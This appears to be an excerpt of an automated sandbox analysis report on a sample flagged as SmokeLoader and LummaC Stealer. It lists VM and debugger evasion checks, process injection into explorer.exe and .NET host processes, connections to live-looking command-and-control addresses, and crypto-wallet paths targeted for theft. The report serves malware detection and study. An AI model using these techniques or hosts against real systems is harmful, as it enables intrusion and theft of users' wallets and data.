                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: 6E11.exe PID: 5172, type: MEMORYSTR
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: file.exe, 00000000.00000002.900705286.00000000023CA000.00000004.00000020.00020000.00000000.sdmp, aueuggsBinary or memory string: ASWHOOK
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\explorer.exe TID: 7628Thread sleep count: 395 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7636Thread sleep count: 1318 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7636Thread sleep time: -131800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 7632Thread sleep count: 971 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7632Thread sleep time: -97100s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3344Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 7860Thread sleep count: 310 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7868Thread sleep count: 369 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7868Thread sleep time: -36900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 7876Thread sleep count: 344 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7876Thread sleep time: -34400s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 7636Thread sleep count: 3065 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7636Thread sleep time: -306500s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exe TID: 5536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6584Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7720Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 395Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1318Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 971Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 369Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3065Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetAdaptersInfo,GetAdaptersInfo,22_2_00421AC8
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeAPI call chain: ExitProcess graph end nodegraph_21-43964
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeAPI call chain: ExitProcess graph end nodegraph_21-42549
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_22-33592
                Source: explorer.exe, 00000001.00000000.897166036.0000000009DFB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000149A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149273611.0000000005398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: explorer.exe, 00000001.00000000.897027571.0000000006929000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}(
                Source: explorer.exe, 00000001.00000000.898063450.000000000EA20000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.897166036.0000000009D5D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000001.00000000.896996023.00000000067AB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.897166036.0000000009D5D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: explorer.exe, 00000001.00000000.897166036.0000000009EB7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}[\yf
                Source: explorer.exe, 00000001.00000000.897166036.0000000009EB7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}a
                Source: explorer.exe, 00000001.00000000.898063450.000000000EA20000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`?Le
                Source: RegAsm.exe, 00000016.00000002.1121991366.0000000001516000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000001.00000000.898063450.000000000EA20000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
                Source: explorer.exe, 00000001.00000000.897166036.0000000009D5D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00Rom0
                Source: explorer.exe, 00000001.00000000.897166036.0000000009D5D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: explorer.exe, 00000001.00000000.896996023.00000000067A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000z
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00456688 FindFirstFileExW,22_2_00456688
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0045673C FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_0045673C
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0BB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,21_2_6F0BB6C0
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_025CB174 push dword ptr fs:[00000030h]15_2_025CB174
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00454295 mov eax, dword ptr fs:[00000030h]22_2_00454295
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043D47B mov eax, dword ptr fs:[00000030h]22_2_0043D47B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0044861A mov ecx, dword ptr fs:[00000030h]22_2_0044861A
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F10948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_6F10948B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0042FB78 GetProcessHeap,GetProcessHeap,HeapAlloc,GetDIBits,ReleaseDC,HeapFree,GetObjectW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDC,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlFreeHeap,GetProcessHeap,22_2_0042FB78
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F10948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_6F10948B
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F10B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_6F10B144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043E949 SetUnhandledExceptionFilter,22_2_0043E949
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043E955 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0043E955
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00452ABB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00452ABB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043EE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0043EE60

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 200.92.136.254 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: gudintas.at
                Source: C:\Windows\explorer.exeNetwork Connect: 211.181.24.133 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: h170811.srv22.test-hf.su
                Source: C:\Windows\explorer.exeNetwork Connect: 193.149.185.139 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 186.182.55.44 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 180.94.156.61 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 91.227.16.22 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 186.147.159.19 80Jump to behavior
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: EDBC.exe.1.drJump to dropped file
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 4FF19B0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsThread created: unknown EIP: 50219B0Jump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 463000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46F000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 472000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1089008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 465000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 471000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 474000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E55008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                Source: explorer.exe, 00000001.00000000.896527065.0000000001370000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000001.00000000.896992671.0000000005AA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.896527065.0000000001370000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.897166036.0000000009E75000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.896527065.0000000001370000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.896472845.0000000000E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman4
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6E11.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F1084B0 cpuid 21_2_6F1084B0
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F10A25A GetSystemTimeAsFileTime,__aulldiv,21_2_6F10A25A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00458344 GetTimeZoneInformation,22_2_00458344

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1048474823.000000000407D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 1072, type: MEMORYSTR
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0.3.file.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.3.aueuggs.2510000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aueuggs.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aueuggs.2500e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.951015355.0000000002531000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.885330632.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.939764066.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.900666807.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.951003696.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: RegAsm.exe, 00000016.00000002.1121991366.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: RegAsm.exe, 00000016.00000002.1122515831.00000000039FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Chrome/Default/Extensions/Jaxx LibertydF0NdjJo58nT0loLbtodKZ23OZhLcN9em0eOFkHMnSDDoHXgvtfsQLScjWLBkJbgF624OaTBqFEdz9n8Z8wG55Rgg/+51wbvE2hwX0757WmxEmrxv/xXaLGymhbnQy3+xX+FFudFW/yoyAEMauM/okcYuyQRgMCydQt1iZfASy7xEojoSzwBRDkJkdjKJHcu3AkXK2TG+6s/vaP/zE9f/9wPowfqt10CriCRDqB5uozyOMH57kspsCVwmgelfFrVvWcK2fIAGHzH56BiDIF9NGv31M1NtKXNeZ2UtetPTYWLQiHb4bLfWJ5VjWbdvEB/PTkJBmah5Y7T1iBTemR6Esjh
                Source: RegAsm.exe, 00000016.00000002.1121991366.0000000001516000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
